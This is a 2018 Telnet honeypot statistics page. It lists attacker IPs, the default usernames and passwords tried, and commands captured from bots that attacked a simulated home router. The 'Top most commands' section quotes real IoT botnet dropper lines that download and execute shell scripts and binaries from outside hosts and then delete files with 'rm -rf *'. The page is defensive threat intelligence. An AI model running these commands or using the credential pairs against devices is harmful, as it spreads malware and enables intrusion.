Honeypot Telnet

This page is updated daily. Last update: 2018-07-20 22:09:02 UTC

The followings Telnet blacklists (updated every day and in text format) contains IP addresses of hosts which tried to bruteforce into my honeypot located in Italy.
The honeypot simulates a home router with a weak password and the most usual commands.
Monthly Telnet login attempts

Attackers blacklists (IP address)

24 hours (txt)week (txt)year (txt)

Other informations

All passwords order by length (txt)
HTTP urls collected (txt)
Monthly connections (txt)

Statistics - 2018

Unique IP address15778
Unique username552
Unique password1338

Latest commands executed

Timestamp Command IP address AS AS Org Country
2018-07-20enable121.206.50.1814134CHINANET-BACKBONE No.31,J...CN
2018-07-20enable121.206.50.1814134CHINANET-BACKBONE No.31,J...CN
2018-07-20enable121.206.50.1814134CHINANET-BACKBONE No.31,J...CN
2018-07-20enable82.46.252.855089NTL, GBGB
2018-07-20enable85.95.166.3312389ROSTELECOM-AS, RURU
2018-07-20enable85.95.166.3312389ROSTELECOM-AS, RURU
2018-07-20enable85.95.166.3312389ROSTELECOM-AS, RURU
2018-07-20enable85.95.166.3312389ROSTELECOM-AS, RURU
2018-07-20enable85.95.166.3312389ROSTELECOM-AS, RURU
2018-07-20enable37.191.199.18457963LYNET-INTERNETT-AS, NONO

Top most sessions per distinct IP address - 2018

IP Address AS AS Org Country
185.12.179.208 (virustotal) (dnsbl-check)200185XANDMAIL-ASN, DEDE
46.101.36.85 (virustotal) (dnsbl-check)14061DIGITALOCEAN-ASN DigitalOcean, LLC, USGB
94.177.248.67 (virustotal) (dnsbl-check)199883ARUBACLOUDLTD-ASN, GBUNK
188.166.119.55 (virustotal) (dnsbl-check)14061DIGITALOCEAN-ASN DigitalOcean, LLC, USNL
62.211.128.95 (virustotal) (dnsbl-check)3269ASN-IBSNAZ, ITIT
205.185.117.65 (virustotal) (dnsbl-check)53667PONYNET FranTech Solutions, USUS
171.221.218.100 (virustotal) (dnsbl-check)4134CHINANET-BACKBONE No.31,J...CN
79.21.77.220 (virustotal) (dnsbl-check)3269ASN-IBSNAZ, ITIT
77.218.13.66 (virustotal) (dnsbl-check)1257TELE2, SESE
167.99.59.89 (virustotal) (dnsbl-check)14061DIGITALOCEAN-ASN DigitalOcean, LLC, USUNK

Login attempts last 10 days

Date Occurrences
2018-07-201589
2018-07-191024
2018-07-181404
2018-07-171316
2018-07-161402
2018-07-151132
2018-07-141691
2018-07-131074
2018-07-121521
2018-07-111941

Top username - 2018

Username
root
shell
enable
admin
default
guest
user
support
supervisor
Administrator

Top password - 2018

Password
sh
system
admin
bin
1234
12345
default
password
user
system

Top username/password - 2018

Username / Password
shell / sh
enable / system
root / vizxv
root / aquario
admin / admin
root / default
user / user
shell / sh
enable / system
root / hunt5759

Top most commands - 2018

Command
enable
enable
linuxsh
/bin/busybox wget http://fun.r00ts.ninja/bins/arm -O - > scanHA; /bin/busybox chmod 777 scanHA; ./scanHA telnet.scanner; /bin/busybox SORA
sh
start
PAYLOADZZZZ
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.34.237.179/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 89.34.237.179 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 89.34.237.179; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 89.34.237.179 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit
ping 127.0.0.1 -c1 && sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.172.110.207/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 185.172.110.207 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.172.110.207; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.172.110.207 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit

See also

Detux - multiplatform Linux Sandbox
IoT bad password sheet by krebsonsecurity.com
Leaked Mirai source code for research/IoC development purposes